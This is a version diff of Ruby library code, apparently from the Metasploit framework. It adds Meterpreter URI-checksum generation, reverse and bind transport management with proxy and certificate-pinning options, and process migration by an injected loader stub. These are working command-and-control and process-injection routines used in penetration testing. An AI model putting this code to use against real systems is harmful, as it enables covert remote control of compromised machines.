rex 2.0.8 → 2.0.9

data/lib/rex/payloads/meterpreter/uri_checksum.rb

@@ -0,0 +1,136 @@
+# -*- coding: binary -*-
+require 'msf/core/payload/uuid'
+
+module Rex
+  module Payloads
+    module Meterpreter
+      module UriChecksum
+
+        #
+        # Define 8-bit checksums for matching URLs
+        # These are based on charset frequency
+        #
+        URI_CHECKSUM_INITW      = 92 # Windows
+        URI_CHECKSUM_INITN      = 92 # Native (same as Windows)
+        URI_CHECKSUM_INITP      = 80 # Python
+        URI_CHECKSUM_INITJ      = 88 # Java
+        URI_CHECKSUM_CONN       = 98 # Existing session
+        URI_CHECKSUM_INIT_CONN  = 95 # New stageless session
+
+        # Mapping between checksums and modes
+        URI_CHECKSUM_MODES = Hash[
+          URI_CHECKSUM_INITN,      :init_native,
+          URI_CHECKSUM_INITP,      :init_python,
+          URI_CHECKSUM_INITJ,      :init_java,
+          URI_CHECKSUM_INIT_CONN,  :init_connect,
+          URI_CHECKSUM_CONN,       :connect
+        ]
+
+        URI_CHECKSUM_MIN_LEN = 5
+
+        # Limit how long :connect URLs are to stay within 256 bytes when including
+        # the hostname, colon, port, and leading slash
+        URI_CHECKSUM_CONN_MAX_LEN = 128
+
+        URI_CHECKSUM_UUID_MIN_LEN = URI_CHECKSUM_MIN_LEN + Msf::Payload::UUID::UriLength
+
+        # Map "random" URIs to static strings, allowing us to randomize
+        # the URI sent in the first request.
+        #
+        # @param uri [String] The URI string from the HTTP request
+        # @return [Hash] The attributes extracted from the URI
+        def process_uri_resource(uri)
+
+          # Ignore non-base64url characters in the URL
+          uri_bare = uri.gsub(/[^a-zA-Z0-9_\-]/, '')
+
+          # Figure out the mode based on the checksum
+          uri_csum = Rex::Text.checksum8(uri_bare)
+
+          # Extract the UUID if the URI is long enough
+          uri_uuid = nil
+          if uri_bare.length >= URI_CHECKSUM_UUID_MIN_LEN
+            uri_uuid = Msf::Payload::UUID.new(uri: uri_bare)
+          end
+
+          uri_mode = URI_CHECKSUM_MODES[uri_csum]
+
+          # Return a hash of URI attributes
+          { uri: uri_bare, sum: uri_csum, uuid: uri_uuid, mode: uri_mode }
+        end
+
+        # Create a URI that matches the specified checksum and payload uuid
+        #
+        # @param sum [Fixnum] A checksum mode value to use for the generated url
+        # @param uuid [Msf::Payload::UUID] A valid UUID object
+        # @param len [Fixnum] An optional URI length value, including the leading slash
+        # @return [String] The URI string for connections
+        def generate_uri_uuid(sum, uuid, len=nil)
+          curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN+rand(URI_CHECKSUM_CONN_MAX_LEN-URI_CHECKSUM_UUID_MIN_LEN)
+          curl_prefix  = uuid.to_uri
+
+          if len
+            # Subtract a byte to take into account the leading /
+            curl_uri_len = len - 1
+          end
+
+          if curl_uri_len < URI_CHECKSUM_UUID_MIN_LEN
+            raise ArgumentError, "Length must be #{URI_CHECKSUM_UUID_MIN_LEN+1} bytes or greater"
+          end
+
+          # Pad out the URI and make the checksum match the specified sum
+          "/" + generate_uri_checksum(sum, curl_uri_len, curl_prefix)
+        end
+
+        # Create an arbitrary length URI that matches a given checksum
+        #
+        # @param sum [Fixnum] The checksum value that the generated URI should match
+        # @param len [Fixnum] The length of the URI to generate
+        # @param prefix [String] The optional prefix to use to build the URI
+        # @return [String] The URI string that checksums to the given value
+        def generate_uri_checksum(sum, len=5, prefix="")
+          # Lengths shorter than 4 bytes are unable to match all possible checksums
+          # Lengths of exactly 4 are relatively slow to find for high checksum values
+          # Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms)
+          if len < URI_CHECKSUM_MIN_LEN
+            raise ArgumentError, "Length must be #{URI_CHECKSUM_MIN_LEN} bytes or greater"
+          end
+
+          gen_len = len-prefix.length
+          if gen_len < URI_CHECKSUM_MIN_LEN
+            raise ArgumentError, "Prefix must be at least {URI_CHECKSUM_MIN_LEN} bytes smaller than total length"
+          end
+
+          # Brute force a matching checksum for shorter URIs
+          if gen_len < 40
+            loop do
+              uri = prefix + Rex::Text.rand_text_base64url(gen_len)
+              return uri if Rex::Text.checksum8(uri) == sum
+            end
+          end
+
+          # The rand_text_base64url() method becomes a bottleneck at around 40 bytes
+          # Calculating a static prefix flattens out the average runtime for longer URIs
+          prefix << Rex::Text.rand_text_base64url(gen_len-20)
+
+          loop do
+            uri = prefix + Rex::Text.rand_text_base64url(20)
+            return uri if Rex::Text.checksum8(uri) == sum
+          end
+        end
+
+        # Return the numerical checksum for a given mode symbol
+        #
+        # @param mode [Symbol] The mode symbol to lookup (:connect, :init_native, :init_python, :init_java)
+        # @return [Fixnum] The URI checksum value corresponding with the mode
+        def uri_checksum_lookup(mode)
+          sum = URI_CHECKSUM_MODES.keys.select{|ksum| URI_CHECKSUM_MODES[ksum] == mode}.first
+          unless sum
+            raise ArgumentError, "Unknown checksum mode: #{mode}"
+          end
+          sum
+        end
+      end
+    end
+  end
+end

data/lib/rex/post/meterpreter.rb

@@ -1,5 +1,5 @@
 # -*- coding: binary -*-
 
-require 'meterpreter_bins'
+require 'metasploit-payloads'
 require 'rex/post/meterpreter/client'
 require 'rex/post/meterpreter/ui/console'

data/lib/rex/post/meterpreter/client.rb

@@ -85,11 +85,18 @@ class Client
   # Cleans up the meterpreter instance, terminating the dispatcher thread.
   #
   def cleanup_meterpreter
-    ext.aliases.each_value do | extension |
-      extension.cleanup if extension.respond_to?( 'cleanup' )
+    if not self.skip_cleanup
+      ext.aliases.each_value do | extension |
+        extension.cleanup if extension.respond_to?( 'cleanup' )
+      end
     end
+
     dispatcher_thread.kill if dispatcher_thread
-    core.shutdown rescue nil
+
+    if not self.skip_cleanup
+      core.shutdown rescue nil
+    end
+
     shutdown_passive_dispatcher
   end
 
@@ -111,6 +118,8 @@ class Client
     self.ssl          = opts[:ssl]
     self.expiration   = opts[:expiration]
     self.comm_timeout = opts[:comm_timeout]
+    self.retry_total  = opts[:retry_total]
+    self.retry_wait   = opts[:retry_wait]
     self.passive_dispatcher = opts[:passive_dispatcher]
 
     self.response_timeout = opts[:timeout] || self.class.default_timeout
@@ -194,6 +203,7 @@ class Client
     self.sock.extend(Rex::Socket::SslTcp)
     self.sock.sslsock = ssl
     self.sock.sslctx  = ctx
+    self.sock.sslhash = Rex::Text.sha1_raw(ctx.cert.to_der)
 
     tag = self.sock.get_once(-1, 30)
     if(not tag or tag !~ /^GET \//)
@@ -206,6 +216,7 @@ class Client
     self.sock.sslsock.close
     self.sock.sslsock = nil
     self.sock.sslctx  = nil
+    self.sock.sslhash = nil
     self.sock = self.sock.fd
     self.sock.extend(::Rex::Socket::Tcp)
   end
@@ -451,6 +462,14 @@ class Client
   #
   attr_accessor :comm_timeout
   #
+  # The total time for retrying connections
+  #
+  attr_accessor :retry_total
+  #
+  # The time to wait between retry attempts
+  #
+  attr_accessor :retry_wait
+  #
   # The Passive Dispatcher
   #
   attr_accessor :passive_dispatcher
@@ -462,6 +481,10 @@ class Client
   # A list of the commands
   #
   attr_reader :commands
+  #
+  # The timestamp of the last received response
+  #
+  attr_accessor :last_checkin
 
 protected
   attr_accessor :parser, :ext_aliases # :nodoc:

data/lib/rex/post/meterpreter/client_core.rb

@@ -8,8 +8,12 @@ require 'rex/post/meterpreter/client'
 # argument for moving the meterpreter client into the Msf namespace.
 require 'msf/core/payload/windows'
 
-# Provides methods to patch options into the metsrv stager.
-require 'rex/payloads/meterpreter/patch'
+# URI uuid and checksum stuff
+require 'msf/core/payload/uuid'
+require 'rex/payloads/meterpreter/uri_checksum'
+
+# certificate hash checking
+require 'rex/parser/x509_certificate'
 
 module Rex
 module Post
@@ -28,11 +32,29 @@ class ClientCore < Extension
   UNIX_PATH_MAX = 108
   DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
 
+  METERPRETER_TRANSPORT_SSL   = 0
+  METERPRETER_TRANSPORT_HTTP  = 1
+  METERPRETER_TRANSPORT_HTTPS = 2
+
+  TIMEOUT_SESSION = 24*3600*7  # 1 week
+  TIMEOUT_COMMS = 300          # 5 minutes
+  TIMEOUT_RETRY_TOTAL = 60*60  # 1 hour
+  TIMEOUT_RETRY_WAIT = 10      # 10 seconds
+
+  VALID_TRANSPORTS = {
+    'reverse_tcp'   => METERPRETER_TRANSPORT_SSL,
+    'reverse_http'  => METERPRETER_TRANSPORT_HTTP,
+    'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
+    'bind_tcp'      => METERPRETER_TRANSPORT_SSL
+  }
+
+  include Rex::Payloads::Meterpreter::UriChecksum
+
   #
   # Initializes the 'core' portion of the meterpreter client commands.
   #
   def initialize(client)
-    super(client, "core")
+    super(client, 'core')
   end
 
   ##
@@ -41,6 +63,92 @@ class ClientCore < Extension
   #
   ##
 
+  #
+  # Get a list of loaded commands for the given extension.
+  #
+  def get_loaded_extension_commands(extension_name)
+    request = Packet.create_request('core_enumextcmd')
+    request.add_tlv(TLV_TYPE_STRING, extension_name)
+
+    begin
+      response = self.client.send_packet_wait_response(request, self.client.response_timeout)
+    rescue
+      # In the case where orphaned shells call back with OLD copies of the meterpreter
+      # binaries, we end up with a case where this fails. So here we just return the
+      # empty list of supported commands.
+      return []
+    end
+
+    # No response?
+    if response.nil?
+      raise RuntimeError, 'No response was received to the core_enumextcmd request.', caller
+    elsif response.result != 0
+      # This case happens when the target doesn't support the core_enumextcmd message.
+      # If this is the case, then we just want to ignore the error and return an empty
+      # list. This will force the caller to load any required modules.
+      return []
+    end
+
+    commands = []
+    response.each(TLV_TYPE_STRING) { |c|
+      commands << c.value
+    }
+
+    commands
+  end
+
+  def transport_list
+    request = Packet.create_request('core_transport_list')
+    response = client.send_request(request)
+
+    result = {
+      :session_exp => response.get_tlv_value(TLV_TYPE_TRANS_SESSION_EXP),
+      :transports  => []
+    }
+
+    response.each(TLV_TYPE_TRANS_GROUP) { |t|
+      result[:transports] << {
+        :url          => t.get_tlv_value(TLV_TYPE_TRANS_URL),
+        :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
+        :retry_total  => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
+        :retry_wait   => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
+        :ua           => t.get_tlv_value(TLV_TYPE_TRANS_UA),
+        :proxy_host   => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
+        :proxy_user   => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
+        :proxy_pass   => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
+        :cert_hash    => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
+      }
+    }
+
+    result
+  end
+
+  def set_transport_timeouts(opts={})
+    request = Packet.create_request('core_transport_set_timeouts')
+
+    if opts[:session_exp]
+      request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
+    end
+    if opts[:comm_timeout]
+      request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
+    end
+    if opts[:retry_total]
+      request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
+    end
+    if opts[:retry_wait]
+      request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
+    end
+
+    response = client.send_request(request)
+
+    {
+      :session_exp  => response.get_tlv_value(TLV_TYPE_TRANS_SESSION_EXP),
+      :comm_timeout => response.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
+      :retry_total  => response.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
+      :retry_wait   => response.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT)
+    }
+  end
+
   #
   # Loads a library on the remote meterpreter instance.  This method
   # supports loading both extension and non-extension libraries and
@@ -72,7 +180,7 @@ class ClientCore < Extension
 
     # No library path, no cookie.
     if library_path.nil?
-      raise ArgumentError, "No library file path was supplied", caller
+      raise ArgumentError, 'No library file path was supplied', caller
     end
 
     # Set up the proper loading flags
@@ -107,7 +215,7 @@ class ClientCore < Extension
       # path of the local and target so that it gets loaded with a random
       # name
       if opts['Extension']
-        library_path = "ext" + rand(1000000).to_s + ".#{client.binary_suffix}"
+        library_path = "ext#{rand(1000000)}.#{client.binary_suffix}"
         target_path  = library_path
       end
     end
@@ -125,7 +233,7 @@ class ClientCore < Extension
 
     # No response?
     if response.nil?
-      raise RuntimeError, "No response was received to the core_loadlib request.", caller
+      raise RuntimeError, 'No response was received to the core_loadlib request.', caller
     elsif response.result != 0
       raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
     end
@@ -153,44 +261,186 @@ class ClientCore < Extension
     if mod.nil?
       raise RuntimeError, "No modules were specified", caller
     end
-    # Get us to the installation root and then into data/meterpreter, where
-    # the file is expected to be
-    modname = "ext_server_#{mod.downcase}"
-    path = MeterpreterBinaries.path(modname, client.binary_suffix)
 
-    if opts['ExtensionPath']
-      path = ::File.expand_path(opts['ExtensionPath'])
-    end
+    # Query the remote instance to see if commands for the extension are
+    # already loaded
+    commands = get_loaded_extension_commands(mod.downcase)
 
-    if path.nil?
-      raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller
+    # if there are existing commands for the given extension, then we can use
+    # what's already there
+    unless commands.length > 0
+      # Get us to the installation root and then into data/meterpreter, where
+      # the file is expected to be
+      modname = "ext_server_#{mod.downcase}"
+      path = MetasploitPayloads.meterpreter_path(modname, client.binary_suffix)
+
+      if opts['ExtensionPath']
+        path = ::File.expand_path(opts['ExtensionPath'])
+      end
+
+      if path.nil?
+        raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller
+      end
+
+      # Load the extension DLL
+      commands = load_library(
+          'LibraryFilePath' => path,
+          'UploadLibrary'   => true,
+          'Extension'       => true,
+          'SaveToDisk'      => opts['LoadFromDisk'])
     end
 
-    # Load the extension DLL
-    commands = load_library(
-        'LibraryFilePath' => path,
-        'UploadLibrary'   => true,
-        'Extension'       => true,
-        'SaveToDisk'      => opts['LoadFromDisk'])
+    # wire the commands into the client
     client.add_extension(mod, commands)
 
     return true
   end
 
+  def uuid(timeout=nil)
+    request = Packet.create_request('core_uuid')
+
+    args = [ request ]
+    args << timeout if timeout
+    response = client.send_request(*args)
+
+    id = response.get_tlv_value(TLV_TYPE_UUID)
+
+    return Msf::Payload::UUID.new({:raw => id})
+  end
+
+  def machine_id(timeout=nil)
+    request = Packet.create_request('core_machine_id')
+
+    args = [ request ]
+    args << timeout if timeout
+
+    response = client.send_request(*args)
+
+    mid = response.get_tlv_value(TLV_TYPE_MACHINE_ID)
+
+    # Normalise the format of the incoming machine id so that it's consistent
+    # regardless of case and leading/trailing spaces. This means that the
+    # individual meterpreters don't have to care.
+
+    # Note that the machine ID may be blank or nil and that is OK
+    Rex::Text.md5(mid.to_s.downcase.strip)
+  end
+
+  def transport_remove(opts={})
+    request = transport_prepare_request('core_transport_remove', opts)
+
+    return false unless request
+
+    client.send_request(request)
+
+    return true
+  end
+
+  def transport_add(opts={})
+    request = transport_prepare_request('core_transport_add', opts)
+
+    return false unless request
+
+    client.send_request(request)
+
+    return true
+  end
+
+  def transport_change(opts={})
+    request = transport_prepare_request('core_transport_change', opts)
+
+    return false unless request
+
+    client.send_request(request)
+
+    return true
+  end
+
+  def transport_sleep(seconds)
+    return false if seconds == 0
+
+    request = Packet.create_request('core_transport_sleep')
+
+    # we're reusing the comms timeout setting here instead of
+    # creating a whole new TLV value
+    request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, seconds)
+    client.send_request(request)
+    return true
+  end
+
+  def transport_next
+    request = Packet.create_request('core_transport_next')
+    client.send_request(request)
+    return true
+  end
+
+  def transport_prev
+    request = Packet.create_request('core_transport_prev')
+    client.send_request(request)
+    return true
+  end
+
+  #
+  # Enable the SSL certificate has verificate
+  #
+  def enable_ssl_hash_verify
+    # Not supported unless we have a socket with SSL enabled
+    return nil unless self.client.sock.type? == 'tcp-ssl'
+
+    request = Packet.create_request('core_transport_setcerthash')
+
+    hash = Rex::Text.sha1_raw(self.client.sock.sslctx.cert.to_der)
+    request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
+
+    client.send_request(request)
+
+    return hash
+  end
+
+  #
+  # Disable the SSL certificate has verificate
+  #
+  def disable_ssl_hash_verify
+    # Not supported unless we have a socket with SSL enabled
+    return nil unless self.client.sock.type? == 'tcp-ssl'
+
+    request = Packet.create_request('core_transport_setcerthash')
+
+    # send an empty request to disable it
+    client.send_request(request)
+
+    return true
+  end
+
+  #
+  # Attempt to get the SSL hash being used for verificaton (if any).
+  #
+  # @return 20-byte sha1 hash currently being used for verification.
+  #
+  def get_ssl_hash_verify
+    # Not supported unless we have a socket with SSL enabled
+    return nil unless self.client.sock.type? == 'tcp-ssl'
+
+    request = Packet.create_request('core_transport_getcerthash')
+    response = client.send_request(request)
+
+    return response.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
+  end
+
   #
   # Migrates the meterpreter instance to the process specified
   # by pid.  The connection to the server remains established.
   #
-  def migrate(pid, writable_dir = nil)
-    keepalive = client.send_keepalives
+  def migrate(pid, writable_dir = nil, opts = {})
+    keepalive              = client.send_keepalives
     client.send_keepalives = false
-    process       = nil
-    binary_suffix = nil
-    old_platform      = client.platform
-    old_binary_suffix = client.binary_suffix
+    process                = nil
+    binary_suffix          = nil
+    old_platform           = client.platform
+    old_binary_suffix      = client.binary_suffix
 
     # Load in the stdapi extension if not allready present so we can determine the target pid architecture...
-    client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
+    client.core.use('stdapi') if not client.ext.aliases.include?('stdapi')
 
     # Determine the architecture for the pid we are going to migrate into...
     client.sys.process.processes.each { | p |
@@ -201,8 +451,8 @@ class ClientCore < Extension
     }
 
     # We cant migrate into a process that does not exist.
-    if process.nil?
-      raise RuntimeError, "Cannot migrate into non existent process", caller
+    unless process
+      raise RuntimeError, 'Cannot migrate into non existent process', caller
     end
 
     # We cannot migrate into a process that we are unable to open
@@ -215,7 +465,7 @@ class ClientCore < Extension
 
     # And we also cannot migrate into our own current process...
     if process['pid'] == client.sys.process.getpid
-      raise RuntimeError, "Cannot migrate into current process", caller
+      raise RuntimeError, 'Cannot migrate into current process', caller
     end
 
     if client.platform =~ /linux/
@@ -234,19 +484,19 @@ class ClientCore < Extension
     blob = generate_payload_stub(process)
 
     # Build the migration request
-    request = Packet.create_request( 'core_migrate' )
+    request = Packet.create_request('core_migrate')
 
     if client.platform =~ /linux/i
       socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5)))
 
       if socket_path.length > UNIX_PATH_MAX - 1
-        raise RuntimeError, "The writable dir is too long", caller
+        raise RuntimeError, 'The writable dir is too long', caller
       end
 
       pos = blob.index(DEFAULT_SOCK_PATH)
 
       if pos.nil?
-        raise RuntimeError, "The meterpreter binary is wrong", caller
+        raise RuntimeError, 'The meterpreter binary is wrong', caller
       end
 
       blob[pos, socket_path.length + 1] = socket_path + "\x00"
@@ -260,14 +510,17 @@ class ClientCore < Extension
     request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
     request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
     request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
+
     if process['arch'] == ARCH_X86_64
       request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
     else
       request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
     end
 
-    # Send the migration request (bump up the timeout to 60 seconds)
-    client.send_request( request, 60 )
+    # Send the migration request. Timeout can be specified by the caller, or set to a min
+    # of 60 seconds.
+    timeout = [(opts[:timeout] || 0), 60].max
+    client.send_request(request, timeout)
 
     if client.passive_service
       # Sleep for 5 seconds to allow the full handoff, this prevents
@@ -289,7 +542,7 @@ class ClientCore < Extension
         # keep from hanging the packet dispatcher thread, which results
         # in blocking the entire process.
         begin
-          Timeout.timeout(60) do
+          Timeout.timeout(timeout) do
             # Renegotiate SSL over this socket
             client.swap_sock_ssl_to_plain()
             client.swap_sock_plain_to_ssl()
@@ -350,17 +603,106 @@ class ClientCore < Extension
     if not client.passive_service
       self.client.send_packet(request)
     else
-    # If this is a HTTP/HTTPS session we need to wait a few seconds
-    # otherwise the session may not receive the command before we
-    # kill the handler. This could be improved by the server side
-    # sending a reply to shutdown first.
+      # If this is a HTTP/HTTPS session we need to wait a few seconds
+      # otherwise the session may not receive the command before we
+      # kill the handler. This could be improved by the server side
+      # sending a reply to shutdown first.
       self.client.send_packet_wait_response(request, 10)
     end
     true
   end
 
+  #
+  # Indicates if the given transport is a valid transport option.
+  #
+  def valid_transport?(transport)
+    if transport
+      VALID_TRANSPORTS.has_key?(transport.downcase)
+    else
+      false
+    end
+  end
+
   private
 
+  def transport_prepare_request(method, opts={})
+    unless valid_transport?(opts[:transport]) && opts[:lport]
+      return nil
+    end
+
+    if opts[:transport].starts_with?('reverse')
+      return false unless opts[:lhost]
+    else
+      # Bind shouldn't have lhost set
+      opts[:lhost] = nil
+    end
+
+    transport = VALID_TRANSPORTS[opts[:transport]]
+
+    request = Packet.create_request(method)
+
+    scheme = opts[:transport].split('_')[1]
+    url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
+
+    if opts[:comm_timeout]
+      request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
+    end
+
+    if opts[:session_exp]
+      request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
+    end
+
+    if opts[:retry_total]
+      request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
+    end
+
+    if opts[:retry_wait]
+      request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
+    end
+
+    # do more magic work for http(s) payloads
+    unless opts[:transport].ends_with?('tcp')
+      if opts[:uri]
+        url << '/' unless opts[:uri].start_with?('/')
+        url << opts[:uri]
+        url << '/' unless opts[:uri].end_with?('/')
+      else
+        sum = uri_checksum_lookup(:connect)
+        url << generate_uri_uuid(sum, opts[:uuid]) + '/'
+      end
+
+      # TODO: randomise if not specified?
+      opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
+      request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
+
+      if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
+        hash = Rex::Parser::X509Certificate.get_cert_file_hash(opts[:cert])
+        request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
+      end
+
+      if opts[:proxy_host] && opts[:proxy_port]
+        prefix = 'http://'
+        prefix = 'socks=' if opts[:proxy_type] == 'socks'
+        proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
+        request.add_tlv(TLV_TYPE_TRANS_PROXY_HOST, proxy)
+
+        if opts[:proxy_user]
+          request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
+        end
+        if opts[:proxy_pass]
+          request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
+        end
+      end
+
+    end
+
+    request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
+    request.add_tlv(TLV_TYPE_TRANS_URL, url)
+
+    return request
+  end
+
+
   def generate_payload_stub(process)
     case client.platform
     when /win/i
@@ -380,11 +722,9 @@ class ClientCore < Extension
 
     # Include the appropriate reflective dll injection module for the target process architecture...
     if process['arch'] == ARCH_X86
-      c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
-      binary_suffix = "x86.dll"
+      c.include( ::Msf::Payload::Windows::MeterpreterLoader )
     elsif process['arch'] == ARCH_X86_64
-      c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
-      binary_suffix = "x64.dll"
+      c.include( ::Msf::Payload::Windows::MeterpreterLoader_x64 )
     else
       raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
     end
@@ -392,41 +732,13 @@ class ClientCore < Extension
     # Create the migrate stager
     migrate_stager = c.new()
 
-    dll = MeterpreterBinaries.path('metsrv',binary_suffix)
-    if dll.nil?
-      raise RuntimeError, "metsrv.#{binary_suffix} not found", caller
-    end
-    migrate_stager.datastore['DLL'] = dll
-
-    blob = migrate_stager.stage_payload
-
-    if client.passive_service
-
-      #
-      # Patch options into metsrv for reverse HTTP payloads
-      #
-      Rex::Payloads::Meterpreter::Patch.patch_passive_service! blob,
-        :ssl            =>  client.ssl,
-        :url            =>  self.client.url,
-        :expiration     => self.client.expiration,
-        :comm_timeout   =>  self.client.comm_timeout,
-        :ua             =>  client.exploit_datastore['MeterpreterUserAgent'],
-        :proxyhost      =>  client.exploit_datastore['PROXYHOST'],
-        :proxyport      =>  client.exploit_datastore['PROXYPORT'],
-        :proxy_type     =>  client.exploit_datastore['PROXY_TYPE'],
-        :proxy_username =>  client.exploit_datastore['PROXY_USERNAME'],
-        :proxy_password =>  client.exploit_datastore['PROXY_PASSWORD']
-
-    end
+    blob = migrate_stager.stage_meterpreter
 
     blob
   end
 
   def generate_linux_stub
-    file = ::File.join(Msf::Config.data_directory, "meterpreter", "msflinker_linux_x86.bin")
-    blob = ::File.open(file, "rb") {|f|
-      f.read(f.stat.size)
-    }
+    blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
 
     blob
   end